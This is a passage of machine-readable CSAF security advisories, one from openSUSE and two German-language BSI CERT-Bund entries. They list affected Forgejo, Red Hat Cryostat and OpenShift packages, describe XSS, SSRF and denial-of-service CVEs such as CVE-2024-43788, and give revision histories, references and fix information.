"forgejo-firewalld-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64", }, product_reference: "forgejo-firewalld-8.0.3-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-firewalld-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le", }, product_reference: "forgejo-firewalld-8.0.3-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-firewalld-8.0.3-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x", }, product_reference: "forgejo-firewalld-8.0.3-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-firewalld-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64", }, product_reference: "forgejo-firewalld-8.0.3-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-selinux-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64", }, product_reference: "forgejo-selinux-8.0.3-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-selinux-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le", }, product_reference: "forgejo-selinux-8.0.3-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-selinux-8.0.3-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x", }, product_reference: "forgejo-selinux-8.0.3-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-selinux-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64", }, product_reference: "forgejo-selinux-8.0.3-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-43788", }, ], notes: [ { category: "general", text: "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack's `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2024-43788", url: "https://www.suse.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "SUSE Bug 1229860 for CVE-2024-43788", url: "https://bugzilla.suse.com/1229860", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L", version: "3.1", }, products: [ "openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-firewalld-8.0.3-1.1.x86_64", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.aarch64", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.ppc64le", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.s390x", "openSUSE Tumbleweed:forgejo-selinux-8.0.3-1.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-09-10T00:00:00Z", details: "moderate", }, ], title: "CVE-2024-43788", }, ], }
wid-sec-w-2024-3089
Vulnerability from csaf_certbund
Published
2024-10-06 22:00
Modified
2024-12-09 23:00
Summary
Red Hat Enterprise Linux (Cryostat): Mehrere Schwachstellen ermöglichen Cross-Site Scripting
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat Enterprise Linux (RHEL) ist eine populäre Linux-Distribution.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux in der Cryostat Komponente ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.
Betroffene Betriebssysteme
- UNIX
{ document: { aggregate_severity: { text: "mittel", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Red Hat Enterprise Linux (RHEL) ist eine populäre Linux-Distribution.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux in der Cryostat Komponente ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.", title: "Angriff", }, { category: "general", text: "- UNIX", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2024-3089 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3089.json", }, { category: "self", summary: "WID-SEC-2024-3089 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3089", }, { category: "external", summary: "RedHat Security Advisory vom 2024-10-06", url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8023 vom 2024-10-14", url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8113 vom 2024-10-15", url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10762 vom 2024-12-03", url: "https://access.redhat.com/errata/RHSA-2024:10762", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10906 vom 2024-12-10", url: "https://access.redhat.com/errata/RHSA-2024:10906", }, ], source_lang: "en-US", title: "Red Hat Enterprise Linux (Cryostat): Mehrere Schwachstellen ermöglichen Cross-Site Scripting", tracking: { current_release_date: "2024-12-09T23:00:00.000+00:00", generator: { date: "2024-12-10T09:46:15.691+00:00", engine: { name: "BSI-WID", version: "1.3.10", }, }, id: "WID-SEC-W-2024-3089", initial_release_date: "2024-10-06T22:00:00.000+00:00", revision_history: [ { date: "2024-10-06T22:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2024-10-13T22:00:00.000+00:00", number: "2", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-10-14T22:00:00.000+00:00", number: "3", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-01T23:00:00.000+00:00", number: "4", summary: "Hinweis auf Komponente Cryostat ergänzt", }, { date: "2024-12-03T23:00:00.000+00:00", number: "5", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-09T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, ], status: "final", version: "6", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, { category: "product_version_range", name: "8 Cryostat <3", product: { name: "Red Hat Enterprise Linux 8 Cryostat <3", product_id: "T037986", }, }, { category: "product_version", name: "8 Cryostat 3", product: { name: "Red Hat Enterprise Linux 8 Cryostat 3", product_id: "T037986-fixed", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:8_cryostat__3", }, }, }, ], category: "product_name", name: "Enterprise Linux", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", notes: [ { category: "description", text: "In der Cryostat Komponente Red Hat Enterprise Linux existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen. Beide Schwachstellen erfordern komplexe Techniken wie Nesting oder beruhen auf der Injektion von nicht sanitisiertem HTML in bestimmte Anwendungen mit bestehenden Sanitisierungsfehlern. Zur erfolgreichen Ausnutzung ist eine Benutzeraktion erforderlich.", }, ], product_status: { known_affected: [ "67646", "T037986", ], }, release_date: "2024-10-06T22:00:00.000+00:00", title: "CVE-2024-43788", }, { cve: "CVE-2024-45801", notes: [ { category: "description", text: "In der Cryostat Komponente Red Hat Enterprise Linux existieren mehrere Cross-Site Scripting Schwachstellen. HTML und Script-Eingaben werden nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstellen beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen. Beide Schwachstellen erfordern komplexe Techniken wie Nesting oder beruhen auf der Injektion von nicht sanitisiertem HTML in bestimmte Anwendungen mit bestehenden Sanitisierungsfehlern. Zur erfolgreichen Ausnutzung ist eine Benutzeraktion erforderlich.", }, ], product_status: { known_affected: [ "67646", "T037986", ], }, release_date: "2024-10-06T22:00:00.000+00:00", title: "CVE-2024-45801", }, ], }
wid-sec-w-2024-3250
Vulnerability from csaf_certbund
Published
2024-10-21 22:00
Modified
2025-01-14 23:00
Summary
Red Hat OpenShift: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Red Hat OpenShift ist eine "Platform as a Service" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um einen Denial of Service Angriff durchzuführen, Daten zu manipulieren, vertrauliche Informationen preiszugeben, einen Cross-Site-Scripting-Angriff durchzuführen und beliebigen Code auszuführen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
{ document: { aggregate_severity: { text: "mittel", }, category: "csaf_base", csaf_version: "2.0", distribution: { tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "de-DE", notes: [ { category: "legal_disclaimer", text: "Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.", }, { category: "description", text: "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) Lösung zur Bereitstellung von Applikationen in der Cloud.", title: "Produktbeschreibung", }, { category: "summary", text: "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat OpenShift ausnutzen, um einen Denial of Service Angriff durchzuführen, Daten zu manipulieren, vertrauliche Informationen preiszugeben, einen Cross-Site-Scripting-Angriff durchzuführen und beliebigen Code auszuführen.", title: "Angriff", }, { category: "general", text: "- Sonstiges\n- UNIX", title: "Betroffene Betriebssysteme", }, ], publisher: { category: "other", contact_details: "csaf-provider@cert-bund.de", name: "Bundesamt für Sicherheit in der Informationstechnik", namespace: "https://www.bsi.bund.de", }, references: [ { category: "self", summary: "WID-SEC-W-2024-3250 - CSAF Version", url: "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3250.json", }, { category: "self", summary: "WID-SEC-2024-3250 - Portal Version", url: "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3250", }, { category: "external", summary: "Red Hat Advisory vom 2024-10-21", url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8229 vom 2024-10-23", url: "https://access.redhat.com/errata/RHSA-2024:8229", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8232 vom 2024-10-23", url: "https://access.redhat.com/errata/RHSA-2024:8232", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8260 vom 2024-10-24", url: "https://access.redhat.com/errata/RHSA-2024:8260", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8263 vom 2024-10-24", url: "https://access.redhat.com/errata/RHSA-2024:8263", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8581 vom 2024-10-29", url: "https://access.redhat.com/errata/RHSA-2024:8581", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8676 vom 2024-10-30", url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8425 vom 2024-10-31", url: "https://access.redhat.com/errata/RHSA-2024:8425", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8337 vom 2024-10-31", url: "https://access.redhat.com/errata/RHSA-2024:8337", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8677 vom 2024-10-30", url: "https://access.redhat.com/errata/RHSA-2024:8677", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8428 vom 2024-10-31", url: "https://access.redhat.com/errata/RHSA-2024:8428", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8692 vom 2024-11-07", url: "https://access.redhat.com/errata/RHSA-2024:8692", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8688 vom 2024-11-06", url: "https://access.redhat.com/errata/RHSA-2024:8688", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8697 vom 2024-11-07", url: "https://access.redhat.com/errata/RHSA-2024:8697", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8700 vom 2024-11-08", url: "https://access.redhat.com/errata/RHSA-2024:8700", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8981 vom 2024-11-13", url: "https://access.redhat.com/errata/RHSA-2024:8981", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10186 vom 2024-11-22", url: "https://access.redhat.com/errata/RHSA-2024:10186", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:8704 vom 2024-12-02", url: "https://access.redhat.com/errata/RHSA-2024:8704", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10762 vom 2024-12-03", url: "https://access.redhat.com/errata/RHSA-2024:10762", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10865 vom 2024-12-05", url: "https://access.redhat.com/errata/RHSA-2024:10865", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10857 vom 2024-12-05", url: "https://access.redhat.com/errata/RHSA-2024:10857", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10906 vom 2024-12-10", url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:10895 vom 2024-12-11", url: "https://access.redhat.com/errata/RHSA-2024:10895", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:11023 vom 2024-12-12", url: "https://access.redhat.com/errata/RHSA-2024:11023", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2024:11293 vom 2024-12-17", url: "https://access.redhat.com/errata/RHSA-2024:11293", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2025:0079 vom 2025-01-08", url: "https://access.redhat.com/errata/RHSA-2025:0079", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2025:0164 vom 2025-01-09", url: "https://access.redhat.com/errata/RHSA-2025:0164", }, { category: "external", summary: "Red Hat Security Advisory RHSA-2025:0323 vom 2025-01-15", url: "https://access.redhat.com/errata/RHSA-2025:0323", }, ], source_lang: "en-US", title: "Red Hat OpenShift: Mehrere Schwachstellen", tracking: { current_release_date: "2025-01-14T23:00:00.000+00:00", generator: { date: "2025-01-15T09:13:29.036+00:00", engine: { name: "BSI-WID", version: "1.3.10", }, }, id: "WID-SEC-W-2024-3250", initial_release_date: "2024-10-21T22:00:00.000+00:00", revision_history: [ { date: "2024-10-21T22:00:00.000+00:00", number: "1", summary: "Initiale Fassung", }, { date: "2024-10-22T22:00:00.000+00:00", number: "2", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-10-23T22:00:00.000+00:00", number: "3", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-10-29T23:00:00.000+00:00", number: "4", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-10-30T23:00:00.000+00:00", number: "5", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-11-06T23:00:00.000+00:00", number: "6", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-11-07T23:00:00.000+00:00", number: "7", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-11-10T23:00:00.000+00:00", number: "8", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-11-12T23:00:00.000+00:00", number: "9", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-11-21T23:00:00.000+00:00", number: "10", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-02T23:00:00.000+00:00", number: "11", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-03T23:00:00.000+00:00", number: "12", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-05T23:00:00.000+00:00", number: "13", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-09T23:00:00.000+00:00", number: "14", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-11T23:00:00.000+00:00", number: "15", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-12T23:00:00.000+00:00", number: "16", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2024-12-17T23:00:00.000+00:00", number: "17", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2025-01-07T23:00:00.000+00:00", number: "18", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2025-01-08T23:00:00.000+00:00", number: "19", summary: "Neue Updates von Red Hat aufgenommen", }, { date: "2025-01-14T23:00:00.000+00:00", number: "20", summary: "Neue Updates von Red Hat aufgenommen", }, ], status: "final", version: "20", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat Enterprise Linux", product: { name: "Red Hat Enterprise Linux", product_id: "67646", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:-", }, }, }, { category: "product_version", name: "Advanced Cluster Security for Kubernetes 4", product: { name: "Red Hat Enterprise Linux Advanced Cluster Security for Kubernetes 4", product_id: "T027916", product_identification_helper: { cpe: "cpe:/o:redhat:enterprise_linux:advanced_cluster_security_for_kubernetes_4", }, }, }, ], category: "product_name", name: "Enterprise Linux", }, { branches: [ { category: "product_version", name: "Kube Descheduler Operator 5", product: { name: "Red Hat OpenShift Kube Descheduler Operator 5", product_id: "T033270", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:kube_descheduler_operator_5", }, }, }, { category: "product_version_range", name: "Network Observability <1.7.0", product: { name: "Red Hat OpenShift Network Observability <1.7.0", product_id: "T038514", }, }, { category: "product_version", name: "Network Observability 1.7.0", product: { name: "Red Hat OpenShift Network Observability 1.7.0", product_id: "T038514-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:network_observability__1.7.0", }, }, }, { category: "product_version_range", name: "Container Platform <4.17.2", product: { name: "Red Hat OpenShift Container Platform <4.17.2", product_id: "T038527", }, }, { category: "product_version", name: "Container Platform 4.17.2", product: { name: "Red Hat OpenShift Container Platform 4.17.2", product_id: "T038527-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.17.2", }, }, }, { category: "product_version_range", name: "<4.14.40", product: { name: "Red Hat OpenShift <4.14.40", product_id: "T038844", }, }, { category: "product_version", name: "4.14.40", product: { name: "Red Hat OpenShift 4.14.40", product_id: "T038844-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:4.14.40", }, }, }, { category: "product_version_range", name: "Container Platform <4.17.4", product: { name: "Red Hat OpenShift Container Platform <4.17.4", product_id: "T038989", }, }, { category: "product_version", name: "Container Platform 4.17.4", product: { name: "Red Hat OpenShift Container Platform 4.17.4", product_id: "T038989-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:container_platform__4.17.4", }, }, }, { category: "product_version_range", name: "Data Foundation <4.14.13", product: { name: "Red Hat OpenShift Data Foundation <4.14.13", product_id: "T040215", }, }, { category: "product_version", name: "Data Foundation 4.14.13", product: { name: "Red Hat OpenShift Data Foundation 4.14.13", product_id: "T040215-fixed", product_identification_helper: { cpe: "cpe:/a:redhat:openshift:data_foundation__4.14.13", }, }, }, ], category: "product_name", name: "OpenShift", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2024-34155", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in Red Hat OpenShift. Diese Schwachstellen betreffen die Pakete go/parser, encoding/gob und go/build/constraint der Golang-Standardbibliothek aufgrund einer unsachgemäßen Behandlung von tief verschachtelten Literalen, Strukturen und Ausdrücken, was eine Stack-Exhaustion ermöglicht. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen 'Denial of Service'-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-34155", }, { cve: "CVE-2024-34156", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in Red Hat OpenShift. Diese Schwachstellen betreffen die Pakete go/parser, encoding/gob und go/build/constraint der Golang-Standardbibliothek aufgrund einer unsachgemäßen Behandlung von tief verschachtelten Literalen, Strukturen und Ausdrücken, was eine Stack-Exhaustion ermöglicht. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen 'Denial of Service'-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-34156", }, { cve: "CVE-2024-34158", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in Red Hat OpenShift. Diese Schwachstellen betreffen die Pakete go/parser, encoding/gob und go/build/constraint der Golang-Standardbibliothek aufgrund einer unsachgemäßen Behandlung von tief verschachtelten Literalen, Strukturen und Ausdrücken, was eine Stack-Exhaustion ermöglicht. Ein entfernter, anonymer Angreifer kann diese Schwachstellen ausnutzen, um einen 'Denial of Service'-Zustand zu erzeugen.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-34158", }, { cve: "CVE-2024-39338", notes: [ { category: "description", text: "Es besteht eine Schwachstelle in Red Hat OpenShift. Dieser Fehler besteht im Axios HTTP-Client aufgrund einer unsachgemäßen Behandlung von pfadrelativen URLs, die fälschlicherweise als protokollrelative URLs verarbeitet werden, wodurch ein Server-Side Request Forgery (SSRF)-Angriff möglich ist. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um Anfragen zu manipulieren und vertrauliche Informationen preiszugeben.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-39338", }, { cve: "CVE-2024-43788", notes: [ { category: "description", text: "In Red Hat OpenShift existiert eine Cross-Site Scripting Schwachstelle. HTML und Script-Eingaben werden in von Webpack generierten Dateien nicht ordnungsgemäß überprüft, bevor sie an den Benutzer zurückgegeben werden. Ein entfernter, anonymer Angreifer kann durch Ausnutzung dieser Schwachstelle beliebigen HTML- und Script-Code durch den Browser des Benutzers im Kontext der betroffenen Seite ausführen. Zur erfolgreichen Ausnutzung ist eine Benutzeraktion erforderlich. Die Ausnutzung dieser Schwachstelle erfordert die Fähigkeit, nicht bereinigte HTML-Attribute einzuschleusen, und ist von bestimmten Webpack-generierten Dateien abhängig, was die Angriffsfläche auf schlecht bereinigte Eingabeszenarien begrenzt.", }, ], product_status: { known_affected: [ "T027916", "T038989", "67646", "T033270", "T038527", "T040215", "T038844", "T038514", ], }, release_date: "2024-10-21T22:00:00.000+00:00", title: "CVE-2024-43788", }, { cve: "CVE-2024-43796", notes: [ { category: "description", text: "Es bestehen mehrere Schwachstellen in Red Hat OpenShift. Diese Fehler betreffen Express, die Send-Bibliothek und die Serve-static-Komponente aufgrund einer unsachgemäßen Eingabevalidierung in bestimmten Funktionen. Ein entfernter, anonymer Angreifer kann diese Schwachstellen zur Ausführung von beliebigem Code ausnutzen. Eine erfolgreiche Ausnutzung erfordert eine Benutzerinteraktion.", }, ], product_status: { known_affected: 